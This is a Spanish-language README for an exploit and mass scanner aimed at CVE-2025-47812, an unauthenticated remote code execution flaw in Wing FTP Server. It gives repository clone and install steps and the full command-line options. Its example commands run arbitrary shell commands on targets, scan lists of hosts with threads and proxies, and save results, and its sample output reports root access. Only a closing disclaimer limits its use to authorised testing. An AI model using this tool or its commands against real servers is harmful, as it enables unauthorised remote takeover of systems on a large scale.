
Exploit y escáner para CVE-2025-47812 dirigido a la ejecución remota de código no autenticada en Wing FTP Server, compatible con escaneo de un solo objetivo, escaneo masivo, proxy y múltiples formatos de salida.
Exploit mejorado para Wing FTP Server CVE-2025-47812 - Unauthenticated Remote Code Execution (RCE)
Clona este repositorio y entra en el directorio:
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt
O simplemente descarga el script CVE-2025-47812.py y ejecútalo.
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]
Exploit para Wing FTP Server CVE-2025-47812 - versión mejorada
opciones:
-h, --help muestra este mensaje
-u URL, --url URL URL objetivo (ej. http://192.168.1.100:5466)
-f FILE, --file FILE archivo con lista de URLs (una por línea)
-c COMMAND, --command COMMAND
comando a ejecutar (por defecto: echo CVE-2025-47812)
-U USERNAME, --username USERNAME
nombre de usuario (default: anonymous)
-P PASSWORD, --password PASSWORD
contraseña (default: vacía)
--check modo verificación: solo comprueba si es vulnerable (usa comando inocuo)
-v, --verbose modo verbose (muestra detalles)
--proxy PROXY proxy (ej. http://127.0.0.1:8080)
--timeout TIMEOUT timeout en segundos (default: 10)
-o OUTPUT, --output OUTPUT
archivo de salida para guardar resultados
--output-format {txt,json,csv}
formato de salida (default: txt)
--threads THREADS número de hilos para escanear múltiples objetivos (default: 5)
--no-progress ocultar barra de progreso
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check
python CVE-2025-47812.py -f targets.txt --threads 10 -o resultados.json --output-format json
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v
El archivo debe contener una URL por línea, por ejemplo:
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.miservidor.com:5466
http://192.168.1.10:5466 - VULNERABLE - usuario: root
http://192.168.1.11:5466 - SEGURO - No vulnerable
[
{
"target": "http://192.168.1.10:5466",
"vulnerable": true,
"info": "usuario: root"
}
]
Target,Vulnerable,Info
http://192.168.1.10:5466,True,usuario: root
Este exploit está diseñado únicamente para fines educativos y pruebas de seguridad autorizadas. El uso no autorizado de esta herramienta contra sistemas sin consentimiento explícito es ilegal y puede conllevar graves consecuencias legales. Los autores no se responsabilizan del mal uso que se le pueda dar.
Si te gusta este trabajo, ¡no olvides darle una estrella ⭐ en GitHub!
Este proyecto está licenciado bajo la MIT License – ver el archivo LICENSE para más detalles.